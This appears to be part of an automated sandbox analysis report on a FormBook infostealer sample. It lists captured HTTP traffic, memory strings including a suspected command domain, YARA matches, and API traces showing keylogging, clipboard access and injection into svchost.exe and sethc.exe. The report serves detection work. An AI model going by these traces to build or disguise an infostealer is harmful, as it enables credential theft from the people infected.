0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 04 Dec 2024 14:33:40 GMTServer: ApacheContent-Length: 514Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 72 65 64 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 65 65 2d 73 6b 65 74 63 68 20 62 6c 75 65 22 3e 3c 2f 64 69 76 3e 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 68 31 3e 34 30 34 3a 0a 09 3c 73 6d 61 6c 6c 3e 50 6c 61 79 65 72 73 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 6d 61 6c 6c 3e 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 04 Dec 2024 14:34:43 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-12-04T14:34:48.1158597Z
                Source: RlKZsaoEJNpD.exe, 00000007.00000002.3780336358.0000000005672000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nicolemichelle.net
                Source: RlKZsaoEJNpD.exe, 00000007.00000002.3780336358.0000000005672000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nicolemichelle.net/4vk9/
                Source: sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: sethc.exe, 00000006.00000002.3778868913.00000000060D2000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.00000000040C2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: sethc.exe, 00000006.00000002.3778868913.0000000005DAE000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.0000000003D9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb
                Source: sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: sethc.exe, 00000006.00000002.3778868913.00000000063F6000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.00000000043E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
                Source: sethc.exe, 00000006.00000002.3778868913.00000000063F6000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.00000000043E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ik.imgkit.net/u1sv5cu4wfj/cribflyer-photos/tr:w-2000
                Source: sethc.exe, 00000006.00000002.3776235683.0000000002F95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=000000
                Source: sethc.exe, 00000006.00000002.3776235683.0000000002F95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: sethc.exe, 00000006.00000002.3776235683.0000000002F95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: sethc.exe, 00000006.00000002.3776235683.0000000002F95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: sethc.exe, 00000006.00000002.3776235683.0000000002F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: sethc.exe, 00000006.00000002.3776235683.0000000002F95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: sethc.exe, 00000006.00000002.3776235683.0000000002F77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: sethc.exe, 00000006.00000003.1747552982.0000000007E22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: sethc.exe, 00000006.00000002.3778868913.0000000006588000.00000004.10000000.00040000.00000000.sdmp, sethc.exe, 00000006.00000002.3780779249.0000000007AF0000.00000004.00000800.00020000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.0000000004578000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: sethc.exe, 00000006.00000003.1752588558.0000000007E4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: sethc.exe, 00000006.00000002.3778868913.0000000005DAE000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.0000000003D9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.everythlngict.org
                Source: sethc.exe, 00000006.00000002.3778868913.0000000005DAE000.00000004.10000000.00040000.00000000.sdmp, RlKZsaoEJNpD.exe, 00000007.00000002.3778198405.0000000003D9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.zoho.com/sites/images/professionally-crafted-themes.png
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00546B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00546B0C
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00546D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00546D07
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00546B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00546B0C
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00532B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00532B37

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.3778150312.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3778103471.0000000004960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1542930105.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3780336358.0000000005610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3771923815.0000000000C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1542601983.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3778462020.00000000030B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1543326979.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: This is a third-party compiled AutoIt script.0_2_004F3D19
                Source: ek8LkB2Cgo.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: ek8LkB2Cgo.exe, 00000000.00000000.1290657620.000000000059E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a9ee6c47-d
                Source: ek8LkB2Cgo.exe, 00000000.00000000.1290657620.000000000059E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: RSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a307d4a8-b
                Source: ek8LkB2Cgo.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_35535821-b
                Source: ek8LkB2Cgo.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f02122d0-7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042CCE3 NtClose,2_2_0042CCE3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272B60 NtClose,LdrInitializeThunk,2_2_03272B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03272DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032735C0 NtCreateMutant,LdrInitializeThunk,2_2_032735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03274340 NtSetContextThread,2_2_03274340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03274650 NtSuspendThread,2_2_03274650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BA0 NtEnumerateValueKey,2_2_03272BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272B80 NtQueryInformationFile,2_2_03272B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BE0 NtQueryValueKey,2_2_03272BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272BF0 NtAllocateVirtualMemory,2_2_03272BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AB0 NtWaitForSingleObject,2_2_03272AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AF0 NtWriteFile,2_2_03272AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272AD0 NtReadFile,2_2_03272AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F30 NtCreateSection,2_2_03272F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F60 NtCreateProcessEx,2_2_03272F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FA0 NtQuerySection,2_2_03272FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FB0 NtResumeThread,2_2_03272FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272F90 NtProtectVirtualMemory,2_2_03272F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272FE0 NtCreateFile,2_2_03272FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272E30 NtWriteVirtualMemory,2_2_03272E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272EA0 NtAdjustPrivilegesToken,2_2_03272EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272E80 NtReadVirtualMemory,2_2_03272E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272EE0 NtQueueApcThread,2_2_03272EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D30 NtUnmapViewOfSection,2_2_03272D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D00 NtSetInformationFile,2_2_03272D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272D10 NtMapViewOfSection,2_2_03272D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DB0 NtEnumerateKey,2_2_03272DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272DD0 NtDelayExecution,2_2_03272DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C00 NtQueryInformationProcess,2_2_03272C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C60 NtCreateKey,2_2_03272C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272C70 NtFreeVirtualMemory,2_2_03272C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CA0 NtQueryInformationToken,2_2_03272CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CF0 NtOpenProcess,2_2_03272CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272CC0 NtQueryVirtualMemory,2_2_03272CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273010 NtOpenDirectoryObject,2_2_03273010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273090 NtSetValueKey,2_2_03273090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032739B0 NtGetContextThread,2_2_032739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273D10 NtOpenProcessToken,2_2_03273D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03273D70 NtOpenThread,2_2_03273D70
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C34650 NtSuspendThread,LdrInitializeThunk,6_2_04C34650
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C34340 NtSetContextThread,LdrInitializeThunk,6_2_04C34340
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04C32CA0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32C60 NtCreateKey,LdrInitializeThunk,6_2_04C32C60
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04C32C70
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32DD0 NtDelayExecution,LdrInitializeThunk,6_2_04C32DD0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04C32DF0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04C32D10
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04C32D30
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04C32EE0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04C32E80
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32FE0 NtCreateFile,LdrInitializeThunk,6_2_04C32FE0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32FB0 NtResumeThread,LdrInitializeThunk,6_2_04C32FB0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32F30 NtCreateSection,LdrInitializeThunk,6_2_04C32F30
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32AD0 NtReadFile,LdrInitializeThunk,6_2_04C32AD0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32AF0 NtWriteFile,LdrInitializeThunk,6_2_04C32AF0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04C32BE0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04C32BF0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04C32BA0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32B60 NtClose,LdrInitializeThunk,6_2_04C32B60
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C335C0 NtCreateMutant,LdrInitializeThunk,6_2_04C335C0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C339B0 NtGetContextThread,LdrInitializeThunk,6_2_04C339B0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32CC0 NtQueryVirtualMemory,6_2_04C32CC0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32CF0 NtOpenProcess,6_2_04C32CF0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32C00 NtQueryInformationProcess,6_2_04C32C00
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32DB0 NtEnumerateKey,6_2_04C32DB0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32D00 NtSetInformationFile,6_2_04C32D00
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32EA0 NtAdjustPrivilegesToken,6_2_04C32EA0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32E30 NtWriteVirtualMemory,6_2_04C32E30
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32F90 NtProtectVirtualMemory,6_2_04C32F90
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32FA0 NtQuerySection,6_2_04C32FA0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32F60 NtCreateProcessEx,6_2_04C32F60
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32AB0 NtWaitForSingleObject,6_2_04C32AB0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C32B80 NtQueryInformationFile,6_2_04C32B80
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C33090 NtSetValueKey,6_2_04C33090
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C33010 NtOpenDirectoryObject,6_2_04C33010
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C33D70 NtOpenThread,6_2_04C33D70
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_04C33D10 NtOpenProcessToken,6_2_04C33D10
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00CA91B0 NtCreateFile,6_2_00CA91B0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00CA9320 NtReadFile,6_2_00CA9320
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00CA94B0 NtClose,6_2_00CA94B0
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00CA9410 NtDeleteFile,6_2_00CA9410
                Source: C:\Windows\SysWOW64\sethc.exeCode function: 6_2_00CA9610 NtAllocateVirtualMemory,6_2_00CA9610
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00536606: CreateFileW,DeviceIoControl,CloseHandle,0_2_00536606
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0052ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_0052ACC5
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_005379D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_005379D3
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0051B0430_2_0051B043
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_005032000_2_00503200
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0052410F0_2_0052410F
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_005102A40_2_005102A4
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_004FE3E30_2_004FE3E3
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0052038E0_2_0052038E
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0052467F0_2_0052467F
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_005106D90_2_005106D9
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0055AACE0_2_0055AACE
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00524BEF0_2_00524BEF
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0051CCC10_2_0051CCC1
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_004FAF500_2_004FAF50
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_004F6F070_2_004F6F07
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0050B11F0_2_0050B11F
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0051D1B90_2_0051D1B9
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_005531BC0_2_005531BC
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0052724D0_2_0052724D
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0051123A0_2_0051123A
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_005313CA0_2_005313CA
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_004F93F00_2_004F93F0
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0050F5630_2_0050F563
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_004F96C00_2_004F96C0
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0053B6CC0_2_0053B6CC
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_004F77B00_2_004F77B0
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_005279C90_2_005279C9
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0050FA570_2_0050FA57
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00503B700_2_00503B70
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_004F9B600_2_004F9B60
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_004F7D190_2_004F7D19
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_0050FE6F0_2_0050FE6F
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_00519ED00_2_00519ED0
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_004F7FA30_2_004F7FA3
                Source: C:\Users\user\Desktop\ek8LkB2Cgo.exeCode function: 0_2_015F89880_2_015F8988
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401BC62_2_00401BC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418CD32_2_00418CD3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E8432_2_0040E843
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E8392_2_0040E839
